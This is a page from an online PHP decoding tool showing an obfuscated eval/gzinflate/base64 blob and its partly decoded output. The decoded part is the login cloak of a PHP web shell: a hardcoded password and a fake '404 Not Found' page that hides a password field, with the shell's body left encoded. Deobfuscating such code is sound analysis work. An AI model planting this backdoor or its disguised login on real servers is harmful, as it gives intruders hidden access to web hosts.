Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('vVPva9swEP1e6P9w1QpxYItTKKN0rlnZUjoYbUiy7UNbjGqdY1Fb8iS5qRn7..

Decoded Output download


error_reporting(0);
@set_time_limit(0);
@session_start();
$xSoftware = trim(getenv("SERVER_SOFTWARE"));
$xServerName = $_SERVER["HTTP_HOST"];
$xPass = $_POST['pass'];
$xCheck_login = 1;
$xPassword = "fedore68";
$xName = "yam";
if($xPass == $xPassword){
$_SESSION['login'] = "$xPass";
}
if($xCheck_login){
if(!isset($_SESSION['login']) or $_SESSION['login'] != $xPassword){
die("
<html>
<head>
<title>404 Not Found</title>
<style type=\"text/css\">
input{
margin:0;
background-color:#fff;
border:1px solid #fff;
}
</style>
</head>

<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle your fucking request.</p>
<hr> 
<address>".$xSoftware." Server at ".$xServerName." Port 80 </address>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<center>
<form method=\"post\">
<input type=\"password\" name=\"pass\">
</form>
</center>
</body>
</html>
");
}
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode('vVPva9swEP1e6P9w1QpxYItTKKN0rlnZUjoYbUiy7UNbjGqdY1Fb8iS5qRn733eSnbT78XlgI+ndu3d38vMeGqNNZrDRxkm1jqbjd/t77y26zMkas0rW0u1Aa6VWmXXcuMhDh09LXbgNNwhn4IysozU6VI8RW84WX2eLbHl9sfp2vpix8UBH84jmitc+4TDrWTfscrWaZ5fXyxW7C7Q5tzYQ5oTdjBo6jvrIhxLzh6zSa6mIcLRjb7QRBLAChTb49oSFyFCIdbz2gCyirTaJ7/LGP4hLvSyXn66vbkZBfHTn83qOT/05ZL+o79MIO5CWbiv6W2AM2sA/dA/+rC0kRmx/LyldXaV+RS786qSrMD2eHsOVdnChWyWSuAcpal1XIbiuwbNb5vDJxbm1t4xCUjWtI92aG6p4OqX273n+sDZe4U2uK21OXxVF4XFqAc3pUfMEVldSwIDTuEkcKvhS8dARbe+16EKPR+mLpuhEWJOuSgSD31u0DgV8WXyGDbegiFh4ImgFrpQWbLDBJLk3qX/PhZCOnMWrqnsNHH4bGYJDgxCqnBCHhsQ3pfTjm45MC05DaxG4gpknf9R5W6NyHi+5EkTsdGugaPMHTx9anCRxE2YxKdDChTDk8JRNnm09YdBbFriDENgZmEJz+mfgZApJvM31N2Qg/h9rjv4m/K7QpoYaXakFWaHR1gUbJMEHW4c0g+FuGSjqfkB6YuwVwuZZNN5+6XiwJRv3vqDnFw==')));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 121bd116414a8acac34b8ecfdf2c079c
Eval Count 1
Decode Time 81 ms